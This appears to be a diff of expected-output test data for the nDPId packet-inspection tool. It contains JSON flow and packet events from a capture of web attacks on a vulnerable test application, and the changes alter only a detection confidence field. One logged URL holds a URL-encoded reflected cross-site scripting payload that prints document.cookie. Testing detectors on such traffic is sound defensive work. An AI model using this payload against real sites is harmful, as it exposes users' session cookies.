00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1499346956871,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346956871,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DqtAAD4Gty2sEAABwKgKMsvoAFDxddP3Oe5\/EIAQAOUi\/QAAAQEICgE43VwD4q7T"} -00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346956870,"flow_last_seen":1499346956871,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346956871,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346956870,"flow_last_seen":1499346956871,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346956871,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346956932,"flow_last_seen":1499346956932,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346956932,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1499346956932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956932,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nj9AAD4GJ5GsEAABwKgKMsvqAFAHDkNUAAAAAKACchBpwwAAAgQFtAQCCAoBON1rAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1499346956932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956932,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy+qiErzRBw5DVaAScSBY+QAAAgQFtAQCCAoD4q7iATjdawEDAwc="} @@ -38,7 +38,7 @@ 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1499346976603,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Un9AAD4Gc1GsEAABwKgKMsxKAFAevqLeAAAAAKACchDe8gAAAgQFtAQCCAoBOPChAAAAAAEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1499346976603,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976603,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzEoKnmxhHr6i36AScSCi1wAAAgQFtAQCCAoD4sIYATjwoQEDAwc="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1499346976604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346976604,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UoBAAD4Gc1isEAABwKgKMsxKAFAevqLfCp5sYoAQAOVB3wAAAQEICgE48KED4sIY"} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976603,"flow_last_seen":1499346976604,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346976604,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976603,"flow_last_seen":1499346976604,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346976604,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976677,"flow_last_seen":1499346976677,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346976677,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1499346976677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8I8VAAD4GogusEAABwKgKMsxMAFCAL9N2AAAAAKACchBM1QAAAgQFtAQCCAoBOPCzAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1499346976677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976677,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzEzfj2P1gC\/Td6AScSBEIgAAAgQFtAQCCAoD4sIqATjwswEDAwc="} @@ -51,8 +51,8 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1499346976999,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976999,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzGAmGFC+ciJO0aAScSCizgAAAgQFtAQCCAoD4sJ7ATjxBAEDAwc="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1499346977000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346977000,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z5JAAD4GXkasEAABwKgKMsxeAFDFSpaWtwyVpoAQAOXRDgAAAQEICgE48QQD4sJ7"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1499346977000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346977000,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0v9VAAD4GBgOsEAABwKgKMsxgAFByIk7RJhhQv4AQAOVB1gAAAQEICgE48QQD4sJ7"} -00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976677,"flow_last_seen":1499346977863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":364,"flow_tot_l4_payload_len":364,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1499346977863,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/dvwa\/js\/dvwaPage.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976999,"flow_last_seen":1499346977870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1499346977870,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976677,"flow_last_seen":1499346977863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":364,"flow_tot_l4_payload_len":364,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1499346977863,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/dvwa\/js\/dvwaPage.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976999,"flow_last_seen":1499346977870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1499346977870,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346983175,"flow_last_seen":1499346983175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346983175,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1499346983175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346983175,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ikRAAD4GO4ysEAABwKgKMsyiAFBY531IAAAAAKACchDDnAAAAgQFtAQCCAoBOPcMAAAAAAEDAwc="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1499346983175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346983175,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzKJurEWjWOd9SaAScSBDxgAAAgQFtAQCCAoD4siDATj3DAEDAwc="} @@ -177,7 +177,7 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1499347035750,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347035750,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OG5AAD4GjWKsEAABwKgKMs7KAFDI6hIKAAAAAKACchCJVwAAAgQFtAQCCAoBOSpkAAAAAAEDAwc="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1499347035750,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347035750,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzsrSHYegyOoSC6AScSAwugAAAgQFtAQCCAoD4vvbATkqZAEDAwc="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1499347035751,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347035751,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OG9AAD4GjWmsEAABwKgKMs7KAFDI6hIL0h2HoYAQAOXPwQAAAQEICgE5KmQD4vvb"} -01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347033203,"flow_last_seen":1499347037012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347037012,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AQ80NQUS4TAQLQVWHMAGXB11KUBK34NZA8RUUD143IFKQDS3P5%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347033203,"flow_last_seen":1499347037012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347037012,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AQ80NQUS4TAQLQVWHMAGXB11KUBK34NZA8RUUD143IFKQDS3P5%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347038276,"flow_last_seen":1499347038276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347038276,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52964,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1499347038276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347038276,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83pNAAD4G5zysEAABwKgKMs7kAFBDY\/JIAAAAAKACchAsDwAAAgQFtAQCCAoBOSzbAAAAAAEDAwc="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1499347038276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347038276,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzuS5pPWWQ2PySaAScSB7fQAAAgQFtAQCCAoD4v5SATks2wEDAwc="} @@ -246,7 +246,7 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1499347066560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347066560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zkNAAD4G94ysEAABwKgKMtAMAFBP5YY5AAAAAKACchBu1QAAAgQFtAQCCAoBOUh6AAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1499347066560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347066560,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Ax\/i5rPT+WGOqAScSA3hQAAAgQFtAQCCAoD4xnxATlIegEDAwc="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1499347066560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347066560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zkRAAD4G95OsEAABwKgKMtAMAFBP5YY6f4ua0IAQAOXWiwAAAQEICgE5SHsD4xnx"} -00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1499346935283,"flow_last_seen":1499346941359,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7240,"flow_tot_l4_payload_len":15748,"flow_avg_l4_payload_len":524,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1499346935283,"flow_last_seen":1499346941359,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7240,"flow_tot_l4_payload_len":15748,"flow_avg_l4_payload_len":524,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935343,"flow_last_seen":1499346941289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935343,"flow_last_seen":1499346941289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 